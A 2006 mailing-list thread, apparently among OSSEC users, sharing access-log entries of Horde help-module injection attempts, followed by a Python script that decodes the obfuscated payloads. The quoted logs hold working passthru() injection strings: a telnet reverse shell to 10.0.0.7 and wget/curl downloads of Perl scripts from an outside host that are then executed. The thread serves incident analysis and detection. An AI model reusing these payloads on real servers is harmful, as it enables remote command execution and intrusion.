Hi Daniel,

Sorry for the late reply. We have similar entries in our logs (there are not too many).
---
85.96.227.229 - - [13/Jun/2006:20:31:49 +0300] "GET /horde/services/help/?show=about&module=;\".passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(98).chr(101).chr(103).chr(95).chr(59).chr(108).chr(115).chr(32).chr(45).chr(97).chr(108).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(101).chr(110).chr(100).chr(95));'. HTTP/1.1" 302 568
85.96.227.229 - - [13/Jun/2006:20:49:11 +0300] "GET /horde/services/help/?show=about&module=;\".passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(98).chr(101).chr(103).chr(95).chr(59).chr(115).chr(108).chr(101).chr(101).chr(112).chr(32).chr(55).chr(50).chr(48).chr(48).chr(124).chr(116).chr(101).chr(108).chr(110).chr(101).chr(116).chr(32).chr(49).chr(48).chr(46).chr(48).chr(46).chr(48).chr(46).chr(55).chr(32).chr(52).chr(51).chr(50).chr(49).chr(124).chr(119).chr(104).chr(105).chr(108).chr(101).chr(32).chr(58).chr(32).chr(59).chr(32).chr(100).chr(111).chr(32).chr(115).chr(104).chr(32).chr(38).chr(38).chr(32).chr(98).chr(114).chr(101).chr(97).chr(107).chr(59).chr(32).chr(100).chr(111).chr(110).chr(101).chr(32).chr(50).chr(62).chr(38).chr(49).chr(124).chr(116).chr(101).chr(108).chr(110).chr(101).chr(116).chr(32).chr(49).chr(48).chr(46).chr(48).chr(46).chr(48).chr(46).chr(55).chr(32).chr(52).chr(51).chr(50).chr(49).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(101).chr(110).chr(100).chr(95));'. HTTP/1.1" 302 1257
---

The first line is:

passthru(echo _cmd_beg_;ls -al;echo _cmd_end_);

The second line is:

passthru(echo _cmd_beg_;sleep 7200|telnet 10.0.0.7 4321|while : ; do sh && break; done 2>&1|telnet 10.0.0.7 4321;echo _cmd_end_);

Regards,
Ahmet Ozturk.

Daniel Cid wrote:
> Is anyone noticing a new horde worm out there? It is related to the
> following vulnerability (http://www.horde.org):
>
> "
> March 28th, 2006. The Horde Team has released a critical security fix
> for the Horde Application Framework versions 3.0 and above. Version
> 2.x and earlier releases are not affected. The fixed Horde versions
> 3.0.10 and 3.1.1 are available. We strongly encourage every user to
> update to the new versions immediately.
>
> There are exploits in the wild for this vulnerability. They can only
> exploit the user the webserver runs as, but are still serious. Please
> upgrade now.
> "
>
> I'm getting alerts from ossec for the following logs (yes, my horde is
> updated :)).
> Is anyone seeing that?
>
>
> 217.160.242.70 - - [20/Jun/2006:13:41:22 -0300] "GET /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22); HTTP/1.0" 200 38012 "-" "lwp-trivial/1.40"
>
> 204.14.90.21 - - [20/Jun/2006:19:00:34 -0300] "GET /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22); HTTP/1.0" 200 37974 "-" "lwp-trivial/1.41"
>
> 204.14.90.21 - - [19/Jun/2006:03:07:23 -0300] "GET /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22); HTTP/1.0" 200 37917 "-" "lwp-trivial/1.41"
>
> 69.16.208.123 - - [18/Jun/2006:11:15:13 -0300] "GET /horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22); HTTP/1.0" 200 37926 "-" "lwp-trivial/1.41"
>
>
> Thanks,
>
> --
> Daniel B. Cid
> dcid @ ( at ) ossec.net
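The two payload styles in this thread (Ahmet's all-chr() chains and Daniel's %22-encoded "literal".chr(47) concatenations) can be decoded mechanically so an alert shows the attempted command rather than the obfuscated form. This is an added example, not code from the thread or from OSSEC; it assumes Apache-style access-log lines, and the sample line below is constructed from the first entry quoted above with a placeholder client IP.

```python
import re
import urllib.parse

# Constructed sample modelled on the first access-log entry quoted in the thread
# (the payload is the one quoted there; the client IP is a placeholder).
SAMPLE_LINE = (
    '192.0.2.10 - - [13/Jun/2006:20:31:49 +0300] "GET /horde/services/help/?show=about&module=;\\".'
    'passthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(98)'
    '.chr(101).chr(103).chr(95).chr(59).chr(108).chr(115).chr(32).chr(45).chr(97).chr(108).chr(59).chr(101)'
    '.chr(99).chr(104).chr(111).chr(32).chr(95).chr(99).chr(109).chr(100).chr(95).chr(101).chr(110).chr(100)'
    '.chr(95));\'. HTTP/1.1" 302 568'
)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# One piece of a PHP string expression: a "literal", a chr(NN) call, or the '.' joining them.
PIECE_RE = re.compile(r'"([^"]*)"|chr\(\s*(\d+)\s*\)|\s*\.\s*')

def fold_php_string(expr):
    """Evaluate an expression made only of "literal" and chr(NN) pieces joined by '.'."""
    out, pos = [], 0
    for m in PIECE_RE.finditer(expr):
        if m.start() != pos:
            break
        piece = m.group(1) if m.group(2) is None else chr(int(m.group(2)))
        out.append(piece or "")  # the joining '.' contributes nothing
        pos = m.end()
    if pos != len(expr):  # a variable or another call: not a pure string, do not guess
        raise ValueError(f"unsupported token near {expr[pos:pos + 12]!r}")
    return "".join(out)

def passthru_argument(target):
    """Raw argument of the first passthru(...) in a (URL-encoded) request target, else None."""
    decoded = urllib.parse.unquote(target)
    start = decoded.find("passthru(")
    if start < 0:
        return None
    begin, depth, in_str = start + len("passthru("), 1, False
    for k, c in enumerate(decoded[begin:], begin):
        if c == '"':
            in_str = not in_str
        elif c == "(" and not in_str:
            depth += 1
        elif c == ")" and not in_str:
            depth -= 1
            if depth == 0:
                return decoded[begin:k]
    return None  # unbalanced parentheses: truncated line, or not a call this scanner understands

def injected_command(log_line):
    """Recover the shell command a Horde help-module injection would hand to passthru()."""
    m = REQUEST_RE.search(log_line)
    arg = passthru_argument(m.group("target")) if m else None
    return fold_php_string(arg) if arg is not None else None
```

Running `injected_command` over the second entry above yields the telnet/sh loop Ahmet decoded by hand; a line that carries a passthru() argument the folder cannot reduce raises ValueError rather than returning a guess.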
